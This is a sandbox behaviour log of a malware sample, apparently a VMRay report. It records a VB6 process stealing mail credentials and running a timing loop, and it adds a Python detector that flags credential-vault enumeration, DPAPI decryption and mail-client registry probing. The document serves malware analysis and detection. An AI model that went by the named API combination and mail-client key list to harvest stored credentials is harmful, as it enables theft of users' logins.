Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 6 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 30 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 15 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 4 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 2 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 4 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 6 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 7 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 4 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 1 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 0 True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp, size = 2 True 1
Fn
Data
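Read as a whole, the thread above is a mail-credential harvesting pass: it resolves the Credential Manager API (CredEnumerateA/W, CredReadA) and DPAPI decryption (CryptUnprotectData), probes the profile keys of Outlook, IncrediMail, Group Mail, Windows Live Mail, MSN Messenger and Yahoo Pager, and reads every Windows Mail .oeaccount file it finds before writing a series of short, alternating payload-sized and 1-byte chunks to D3A3.tmp. The thread of Process #9 below, by contrast, spends hundreds of rows in a local-time / tick-count / Sleep(0) loop. Both are patterns an analyst wants pulled out of a several-thousand-row behavior log automatically rather than by scrolling. The Python scorer below is an added example, not part of the VMRay report or of the sample: it parses rows in the report's `Category Operation Information Success Count` layout and flags the two patterns. The rows it runs on are constructed to mirror the ones in this report (the user name, GUID and tick values are placeholders), and the thresholds (three mail-client keys, twenty consecutive timing rows) are assumptions of this example, not values the report states.

```python
"""Score a VMRay-style sequential behavior log for two patterns in the report above:
mail-credential harvesting and a tick-count/Sleep(0) timing loop (added example)."""
import re
from collections import namedtuple

# One row: Category, Operation, Information ("name = value, ..." or "-"), Success, Count
ROW_RE = re.compile(r"^(\w+) (.+?) ((?:\w+ = .*)|-) (True|False) (\d+)$")
Row = namedtuple("Row", "category operation info success count")

# Resolved together in one thread these point at credential harvesting: CredEnumerate*/
# CredRead* walk the Credential Manager vault, CryptUnprotectData decrypts DPAPI blobs.
CRED_APIS = {"CredEnumerateA", "CredEnumerateW", "CredReadA", "CredReadW", "CryptUnprotectData"}

# Mail/IM client registry locations, taken from the keys probed in the report
# (matched as case-insensitive substrings of reg_name).
MAIL_CLIENT_KEYS = [
    r"windows messaging subsystem\profiles", r"\outlook\profiles", r"incredimail",
    r"group mail", r"windows live mail", r"msnmessenger", r"messengerservice",
    r"yahoo\pager", r"identitycrl",
]

def parse_row(line):
    """Return a Row for a line in the report's layout, or None if it is not one."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    cat, op, info, ok, count = m.groups()
    return Row(cat, op, info, ok == "True", int(count))

def is_timing_row(row):
    """Tick-count/local-time reads and zero-length sleeps: a busy-wait's building blocks."""
    return row.category == "System" and (
        row.operation == "Get Time"
        or (row.operation == "Sleep" and row.info.startswith("duration = 0 ")))

def analyze(lines, min_mail_keys=3, min_timing_rows=20):
    rows = [r for r in map(parse_row, lines) if r]
    cred_apis, mail_keys, account_files = set(), [], []
    for r in rows:
        if r.category == "Module" and r.operation == "Get Address":
            m = re.search(r"function = (\w+)", r.info)
            if m and m.group(1) in CRED_APIS:
                cred_apis.add(m.group(1))
        elif r.category == "Registry":
            m = re.search(r"reg_name = (.+)", r.info)
            if m and any(k in m.group(1).lower() for k in MAIL_CLIENT_KEYS):
                mail_keys.append(m.group(1))
        elif r.category == "File" and r.operation == "Read":
            m = re.search(r"filename = ([^,]+)", r.info)
            if m and m.group(1).lower().endswith(".oeaccount"):  # Windows (Live) Mail account store
                account_files.append(m.group(1))
    # Longest unbroken run of timing rows, weighted by the Count column.
    best_rows = best_calls = run_rows = run_calls = 0
    for r in rows:
        if not is_timing_row(r):
            run_rows = run_calls = 0
            continue
        run_rows, run_calls = run_rows + 1, run_calls + r.count
        if run_rows > best_rows:
            best_rows, best_calls = run_rows, run_calls
    harvesting = ("CryptUnprotectData" in cred_apis
                  and bool(cred_apis & {"CredEnumerateA", "CredEnumerateW"})
                  and (len(mail_keys) >= min_mail_keys or bool(account_files)))
    return {
        "cred_apis": sorted(cred_apis),
        "mail_client_keys": mail_keys,
        "account_files": account_files,
        "credential_theft": harvesting,
        "timing_loop_rows": best_rows,
        "timing_loop_calls": best_calls,
        "stalling_loop": best_rows >= min_timing_rows,
    }

def constructed_sample():
    """Rows written in the report's layout; user name, GUID and tick values are placeholders."""
    sw = r"c:\windows\syswow64"
    rows = [
        r"Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles False 1",
        r"Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles False 1",
        r"Registry Open Key reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities False 1",
        r"Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail False 1",
        f"Module Get Address module_name = {sw}\\advapi32.dll, function = CredReadA, address_out = 0x777871c1 True 1",
        f"Module Get Address module_name = {sw}\\advapi32.dll, function = CredEnumerateW, address_out = 0x77787481 True 1",
        f"Module Get Address module_name = {sw}\\crypt32.dll, function = CryptUnprotectData, address_out = 0x76295a7f True 1",
        r"File Read filename = C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{00000000-0000-0000-0000-000000000000}.oeaccount, size = 670, size_out = 670 True 1",
        r"Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1",
    ]
    for i in range(12):  # twelve Local Time / Ticks / Sleep(0) triples, as in Process #9's thread
        rows += [
            "System Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 1",
            f"System Get Time type = Ticks, time = {253200 + 16 * i} True 5",
            "System Sleep duration = 0 milliseconds (0.000 seconds) True 1",
        ]
    rows.append("Window Create wndproc_parameter = 0 True 1")
    return rows
```

The credential flag is the strong signal: the three ingredients (vault enumeration, DPAPI decryption, and mail-client profile locations or .oeaccount reads) have no benign reason to appear together in a Word-spawned process tree. The timing-loop flag is deliberately weak on its own. A GUI runtime's message loop can produce similar tick-count/Sleep(0) churn, and in this report the loop sits in a VB6 binary (msvbvm60.dll, the ThunderRT6Main window class) whose forms are titled after sorting algorithms, so treat a hit as a prompt to find out what the loop is waiting for, not as a verdict. The run of alternating payload-sized and 1-byte writes to D3A3.tmp is consistent with harvested fields being serialized into a delimited record; the dumped data behind those rows is what would confirm it.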
Process #9: oyvgkgw.exe
1285 0
Information Value
ID #9
File Name c:\programdata\oyvgkgw.exe
Command Line "C:\ProgramData\oyvGkGw.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
Information Value
PID 0x64
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x89c
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000a0000 0x00106fff Memory Mapped File Readable False False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00120000 0x0015bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00126fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000140000 0x00140000 0x00141fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x0022ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x003b7fff Pagefile Backed Memory Readable True False False -
oyvgkgw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
private_0x000000000cac0000 0x0cac0000 0x0cb7ffff Private Memory Readable, Writable True False False -
~dfa84a14a0862f3f78.tmp 0x0cac0000 0x0cb3ffff Memory Mapped File Readable, Writable True True False
private_0x000000000cb70000 0x0cb70000 0x0cb7ffff Private Memory Readable, Writable True False False -
private_0x000000000cbd0000 0x0cbd0000 0x0cccffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ccd0000 0x0ccd0000 0x0ce50fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce60000 0x0ce60000 0x0e25ffff Pagefile Backed Memory Readable True False False -
private_0x000000000e260000 0x0e260000 0x0e65ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e660000 0x0e92efff Memory Mapped File Readable False False False -
private_0x000000000e930000 0x0e930000 0x0ea6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e930000 0x0e930000 0x0ea0efff Pagefile Backed Memory Readable True False False -
private_0x000000000ea30000 0x0ea30000 0x0ea6ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000ea70000 0x0ea70000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eb60000 0x0eb60000 0x0eb9ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0edaffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000eba0000 0x0eba0000 0x0ec9ffff Private Memory Readable, Writable True False False -
private_0x000000000ecd0000 0x0ecd0000 0x0ecdffff Private Memory Readable, Writable True False False -
private_0x000000000ed10000 0x0ed10000 0x0ed1ffff Private Memory Readable, Writable True False False -
private_0x000000000ed70000 0x0ed70000 0x0edaffff Private Memory Readable, Writable True False False -
pagefile_0x000000000edb0000 0x0edb0000 0x0f1affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f1b0000 0x0f1b0000 0x0f5a2fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f5b0000 0x0fedffff Memory Mapped File Readable False False False -
private_0x000000000fee0000 0x0fee0000 0x100dffff Private Memory Readable, Writable True False False -
private_0x00000000100e0000 0x100e0000 0x104dffff Private Memory Readable, Writable True False False -
private_0x00000000104e0000 0x104e0000 0x10cdffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x89c
1182 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\programdata\oyvgkgw.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\programdata\oyvgkgw.exe, process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x75a52055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75a25934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x75a259b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x75a7f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x75a7d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x75a7d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x752d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 246816924 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Fn
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = HeapSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create window_name = InsertSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 252752 True 1
Fn
